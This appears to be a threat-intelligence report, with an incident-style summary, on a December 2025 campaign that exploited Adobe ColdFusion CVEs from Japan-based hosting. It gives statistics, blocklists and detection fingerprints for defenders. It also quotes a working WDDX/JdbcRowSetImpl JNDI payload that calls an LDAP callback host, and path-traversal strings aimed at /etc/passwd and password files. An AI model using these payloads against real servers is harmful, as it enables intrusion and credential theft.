Full Report
GreyNoise observed a coordinated exploitation campaign targeting Adobe ColdFusion servers over the Christmas 2025 holiday period. The attack appears to be a single threat actor operating from Japan-based infrastructure (CTG Server Limited). This source was responsible for ~98% of attack traffic, systematically exploiting 10+ ColdFusion CVEs from 2023-2024. The campaign leveraged ProjectDiscovery Interactsh for out-of-band callback verification, with JNDI/LDAP injection as the primary attack vector. The deliberate timing during Christmas Day (68% of traffic) suggests intentional targeting during reduced security monitoring periods. Compiled IoC data files can be found at https://github.com/GreyNoise-Intelligence/gn-research-supplemental-data/tree/main/2025-12-26-coldfusion. Campaign Statistics Metric Value Total Requests 5,940 Unique Source IPs 8 Unique Callback Domains 190 CVEs Targeted 10+ Countries Targeted 20 Peak Activity December 25, 2025 Target Country Breakodown Dest. Country # Sessions United States 4,044 Spain 753 India 128 Canada 100 Chile 100 Germany 100 Pakistan 100 Cambodia 51 Ecuador 50 France 50 Japan 50 Panama 50 Poland 50 South Africa 50 Ghana 48 Kenya 48 Peru 48 Sweden 47 United Kingdom 44 New Zealand 29 Threat Actor Infrastructure Primary The dominant threat actor operates from two IPs on CTG Server Limited, a Japan-based hosting provider. IP Address Requests Percentage ASN 134.122.136.119 3,188 53.7% AS152194 134.122.136.96 2,683 45.2% AS152194 Behavioral Indicators: - Automated scanning with 1-5 second request intervals - Both IPs operated concurrently 41% of the time (coordinated infrastructure) - Cycled through 11 distinct attack types per target - Shared Interactsh session (subdomain prefixes d56*/d57*) Secondary Actors IP Address Organization Country Requests Notes 23.234.85.20 tzulo, inc. Canada 34 Double-encapsulated traffic (VPN) 38.225.206.87 Kennies Star India India 12 Paired with .88, identical patterns 38.225.206.88 Kennies Star India India 11 Paired with .87, identical patterns 172.81.132.99 DataWagon LLC United States 7 — 172.68.119.26 Cloudflare, Inc. Japan 3 CF-proxied traffic 162.159.110.4 Cloudflare, Inc. Japan 2 CF-proxied traffic Targeted Vulnerabilities The campaign exploited the full spectrum of 2023-2024 ColdFusion vulnerabilities: CVE Type Requests Generic RCE Remote Code Execution 1,403 Generic LFI Local File Inclusion 904 CVE-2023-26359 Deserialization RCE 833 CVE-2023-38205 Access Control Bypass 654 CVE-2023-44353 Remote Code Execution 611 CVE-2023-38203 Remote Code Execution 346 CVE-2023-38204 Remote Code Execution 346 CVE-2023-29298 Access Control Bypass 342 CVE-2023-29300 Remote Code Execution 176 CVE-2023-26347 Access Control Bypass 171 CVE-2024-20767 Arbitrary File Read 146 CVE-2023-44352 Reflected XSS 8 Payload Analysis Attack Distribution Payload Type Count Percentage Purpose JNDI/LDAP Injection 189 80% CVE-2023-26359 exploitation WDDX Deserialization 28 12% JdbcRowSetImpl gadget chain Path Traversal/LFI 10 4% Credential harvesting JSP Code Injection 6 3% CVE-2018-15961 verification Command Injection 1 Direct RCE JNDI Injection Details The primary attack vector uses WDDX deserialization to trigger JNDI lookups: wddxPacket version='1.0'> header/> data> struct type='com.sun.rowset.JdbcRowSetImpl'> var name='dataSourceName'> string>ldap://[callback_domain]/[path]string> var> var name='autoCommit'> boolean value='true'/> var> struct> data> wddxPacket> Gadget Chain: com.sun.rowset.JdbcRowSetImpl (JNDI injection via dataSourceName) LFI Targets ../../../../../../../../../../../etc/passwd i/../lib/password.properties Callback Infrastructure Interactsh OAST Platform The threat actor uses ProjectDiscovery Interactsh for out-of-band verification of successful exploitation. Services Used: Service Callbacks Percentage oast.pro 42 22% oast.site 38 20% oast.me 34 18% oast.online 27 14% oast.fun 25 13% oast.live 24 13% Subdomain Pattern Analysis All callback subdomains follow the Interactsh format: 33-character alphanumeric string Actor Correlation via Prefix: Prefix Actor Infrastructure d56* / d57* CTG Server Limited Primary (186 callbacks) d4t* tzulo, inc. Secondary (2 callbacks) d4r* Cloudflare-proxied Secondary (2 callbacks) LDAP Paths Observed: - /rcrzfd — 97 occurrences - /zdfzfd — 92 occurrences These paths likely differentiate payload variants or target tracking. Network Fingerprints JA4T (TCP) Signatures JA4T Fingerprint Count Interpretation 64240_2-4-8-1-3_1460_7 5,784 Linux, standard MTU 64240_2-4-8-1-3_1360_7 50 Linux, VPN/tunnel 64620_2-4-8-1-3_1436_7 44 Linux, PPPoE 64740_2-4-8-1-3_1245_7 34 Linux, double-encapsulated 65495_2-4-8-1-3_65495_7 23 Linux, loopback (proxy) 65535_2-4-8-1-3_1460_13 5 Windows JA4H (HTTP) Signatures JA4H Fingerprint Count Method Headers po11nn060000_4ea4093e6290_000000000000_000000000000 3,382 POST 6 ge11nn040000_532a1ee47909_000000000000_000000000000 1,295 GET 4 ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000 1,257 GET 6 Indicators of Compromise IP Addresses # Primary Threat Actor (CTG Server Limited) - BLOCK IMMEDIATELY 134.122.136.119 134.122.136.96 # Secondary Actors 23.234.85.20 38.225.206.87 38.225.206.88 172.81.132.99 # Cloudflare-Proxied (may be legitimate traffic behind CF) 172.68.119.26 162.159.110.4 ASN AS152194 # CTG Server Limited - Primary actor AS11878 # tzulo, inc. AS150654 # Kennies Star India AS27176 # DataWagon LLC DNS Blocklist (Interactsh Callback Domains) *.oast.pro *.oast.site *.oast.me *.oast.online *.oast.fun *.oast.live JA4+ Fingerprints # JA4T (TCP) 64240_2-4-8-1-3_1460_7 64240_2-4-8-1-3_1360_7 64620_2-4-8-1-3_1436_7 64740_2-4-8-1-3_1245_7 # JA4H (HTTP) po11nn060000_4ea4093e6290_000000000000_000000000000 ge11nn040000_532a1ee47909_000000000000_000000000000 ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000 Sample Callback Domains d4rrp47fn3bphsg36ktgrnxs88i793xh8.oast.fun d4rrp47fn3bphsg36ktgwmhg6gs184cgp.oast.fun d4ttv6m52uktrcfij1mg4z1sxco79xbrx.oast.site d4ttv6m52uktrcfij1mgretwywufsexrr.oast.site d560h4t0mm9g3ve8u8007go4bggx4mfip.oast.pro d560h4t0mm9g3ve8u800f5ujdfhi58ty7.oast.pro d565pronu06u9lln5rug1mt8wad5fbgrk.oast.pro d565pronu06u9lln5rugt8mt8gngf4m1m.oast.pro d56bg80or2rkvmbdrmq04dqz3ahrwu8ft.oast.fun d56bg80or2rkvmbdrmq0gszxyj9npxnx5.oast.fun Appendix: Attack Timeline Date Hour Range (UTC) Requests Primary Actor Dec 23 07:00-15:00 37 Mixed Dec 24 08:00-21:00 25 Mixed Dec 25 04:00-23:00 4,014 CTG Server Limited Dec 26 00:00-10:00 1,864 CTG Server Limited Peak Hour: December 25, 15:00 UTC (317 requests) References CVE-2023-26359 - Adobe ColdFusion Deserialization RCE CVE-2023-38205 - Adobe ColdFusion Access Control Bypass CVE-2024-20767 - Adobe ColdFusion Arbitrary File Read ProjectDiscovery Interactsh - OAST Platform JA4+ Fingerprinting - Network Fingerprint Methodology
Analysis Summary
# Incident Report: Coordinated ColdFusion Christmas Exploitation Campaign
## Executive Summary
A coordinated exploitation campaign targeting Adobe ColdFusion servers was observed during the Christmas 2025 holiday period, exploiting over 10 known CVEs from 2023-2024. The primary threat actor, operating from Japan-based infrastructure (CTG Server Limited), generated approximately 98% of the traffic, primarily utilizing JNDI/LDAP injection to trigger WDDX deserialization. The activity peaked significantly on Christmas Day, indicating deliberate targeting during periods of reduced security team coverage.
## Incident Details
- **Discovery Date:** December 26, 2025 (Based on reporting date following the peak activity)
- **Incident Date:** December 23 – December 26, 2025 (Peak on December 25)
- **Affected Organization:** Organizations running vulnerable instances of Adobe ColdFusion globally.
- **Sector:** Not specified (All organizations running ColdFusion).
- **Geography:** 20 countries targeted globally, with the United States receiving the highest volume of traffic (4,044 sessions).
## Timeline of Events
### Initial Access
- **Date/Time:** Activity observed starting December 23, 07:00 UTC, escalating severely on December 25, 04:00 - 23:00 UTC.
- **Vector:** Weaponized payloads exploiting multiple Adobe ColdFusion CVEs (2023-2024).
- **Details:** Primary method was JNDI/LDAP injection (80% of payloads) achieved via WDDX deserialization, often chaining to the `com.sun.rowset.JdbcRowSetImpl` gadget.
### Lateral Movement
- **Details:** Not explicitly detailed in the context of successful lateral movement following initial exploitation; however, the campaign utilized Local File Inclusion (LFI) techniques (904 requests) targeting sensitive files like `/etc/passwd` and `password.properties`, suggesting preparation for credential harvesting or further system compromise.
### Data Exfiltration/Impact
- **Details:** The use of Interactsh indicates the objective was confirmation of Remote Code Execution (RCE) via callback verification. The specific payloads imply an attempt to achieve RCE, Access Control Bypass, and Arbitrary File Read to compromise target systems. No explicit data exfiltration confirmation available, but the intent was system compromise.
### Detection & Response
- **Detection:** Observed and categorized by GreyNoise intelligence based on anomalous scanning activity and utilization of OAST platforms (Interactsh).
- **Response Actions:** The primary response noted is the documentation and public sharing of Indicators of Compromise (IoCs) via GitHub for community defense.
## Attack Methodology
The attack utilized automated, low-and-slow scanning characteristic of reconnaissance and exploitation attempts attempting to bypass monitoring thresholds.
- **Initial Access:** JNDI/LDAP Injection via WDDX Deserialization (targeting CVE-2023-26359 primarily).
- **Persistence:** Not explicitly detailed, but RCE capability would allow for artifact deployment.
- **Privilege Escalation:** Exploitation involved RCE and Access Control Bypass vulnerabilities (CVE-2023-38205, etc.).
- **Defense Evasion:** Exploitation timed during the Christmas holiday when security staffing is typically reduced. Use of an OAST platform (Interactsh) for beaconing confirms exploitation without dropping a persistent external listener.
- **Credential Access:** Potential through LFI attempts targeting sensitive files.
- **Discovery:** Indirect discovery via LFI attempts (`/etc/passwd`, configuration files).
- **Lateral Movement:** Not the primary focus of observed activity, though RCE could enable it.
- **Collection:** LFI attempts suggest credential harvesting was a secondary goal.
- **Exfiltration:** Confirmation via OAST infrastructure (190 unique callback domains).
- **Impact:** Confirmed network-level call-back, suggesting successful exploitation of RCE/code execution on vulnerable ColdFusion servers globally.
## Impact Assessment
- **Financial:** Not quantified, but includes potential costs associated with remediation, patching, and incident investigation for targeted organizations.
- **Data Breach:** Potential for compromise leading to data exposure, particularly from LFI targeting credential files.
- **Operational:** Low-level systemic disruption from high-volume automated scanning, but successful RCE could lead to significant localized operational impact.
- **Reputational:** Potential damage to organizations found running unpatched ColdFusion instances targeted during this period.
## Indicators of Compromise
- **Network Indicators (IP Addresses - Block Immediately):**
- Primary Actor (CTG Server Limited): `134.122.136.119`, `134.122.136.96`
- Secondary Actors: `23.234.85.20`, `38.225.206.87`, `38.225.206.88`, `172.81.132.99`
- **ASN Indicators:**
- AS152194 (CTG Server Limited)
- **DNS Blocklist (Interactsh Callback Domains):**
- `*.oast.pro`, `*.oast.site`, `*.oast.me`, `*.oast.online`, `*.oast.fun`, `*.oast.live`
- **Behavioral Indicators:**
- Automated scanning with 1-5 second request intervals.
- Coordinated concurrency between the two primary IPs (41% of the time).
- Network fingerprints (JA4T): `64240_2-4-8-1-3_1460_7` (Dominant on Linux targets).
## Response Actions
*Note: Response actions are recommendations based on the threat analysis, as specific organizational response data was not provided.*
- **Containment Measures:** Immediately implement Web Application Firewall (WAF) rules to block traffic originating from the primary threat actor IP addresses and ASN (AS152194).
- **Eradication Steps:** Patch all Adobe ColdFusion instances to address all known 2023 and 2024 CVEs. Conduct forensic analysis on any system showing signs of LFI activity or JNDI connection attempts.
- **Recovery Actions:** Review system logs for evidence of successful payload execution (e.g., unexpected outbound LDAP/DNS requests to Interactsh domains during the attack window).
## Lessons Learned
- **Holiday Vulnerability Targeting:** Threat actors intentionally exploit predictable windows of reduced security monitoring capability (e.g., Christmas holidays).
- **Effectiveness of OAST:** The TTP's strong reliance on OAST (Interactsh) confirms its widespread adoption for reliable, low-footprint validation of RCE exploits.
- **Vulnerability Chaining:** Attackers systematically cycle through a broad range of known, older vulnerabilities (2023/2024 CVEs) rather than focusing on a single zero-day.
## Recommendations
1. **Prioritize ColdFusion Patching:** Ensure an aggressive patching schedule, especially for older, cumulative vulnerabilities that are clearly being weaponized in new campaigns.
2. **Enhance Holiday Monitoring:** Implement elevated monitoring alerts and dedicated on-call rotation during standard slow periods (holidays, weekends) for critical internet-facing services.
3. **Defend Against OAST:** Deploy egress filtering or NDR/DLP capabilities to monitor and alert on outbound connections to known OAST platforms (e.g., Interactsh domains) originating from application servers.
4. **Network Fingerprint Utilization:** Integrate JA4+ signatures into network detection rules for enhanced blocking and forensic analysis of suspicious traffic patterns.